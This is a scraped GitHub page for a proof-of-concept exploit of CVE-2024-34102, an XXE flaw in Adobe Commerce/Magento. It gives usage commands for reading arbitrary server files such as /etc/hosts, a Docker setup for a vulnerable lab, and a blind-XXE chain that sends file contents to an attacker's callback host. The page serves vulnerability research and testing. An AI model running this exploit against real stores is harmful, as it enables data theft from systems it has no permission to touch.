Skip to content

EQSTLab/CVE-2024-34102

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
CVE-2024-34102.py
CVE-2024-34102.py
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2024-34102

★ Thanks to @th3gokul, Sanjaith3hacker, Chocapikk for the original code base. ★

Description

CVE-2024-34102 : Adobe Commerce XXE vulnerability description: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.

How to use

Git clone

git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102

Install packages

pip install -r requirements.txt

Command

python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>

Example

python CVE-2024-34102.py https://magento.test -f /etc/hosts

Output

image

Vulnerable Environment Based on Docker

Thanks to markshust's Docker Configuration for Magento, It isn't hard to make the vulnerable development enviromnet. https://github.com/markshust/docker-magento

# Create your project directory then go into it:
mkdir /opt/magento
cd $_

# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl

# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/

# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.

# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts

image

PHPSTORM

You can debug your magento using PHPSTORM.

1. Turn on your xdebug thru the following command:

bin/xdebug enable

2. And then setup your PHPSTORM like:

image

..And then you can debug your magento.

Attack Scenario

Create callback URL (mocky api) -> Blind XXE attack (CVE-2024-34102) -> Send file contents to attacker's instance (SSRFUtility) -> Read the attacker's instance (SSRFUtility)

Disclaimer

This repository is not intended to be XXE exploit to CVE-2024-34102. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

EQST Insight

We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications. https://www.skshieldus.com/eng/business/insight.do

About

PoC for CVE-2024-34102

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages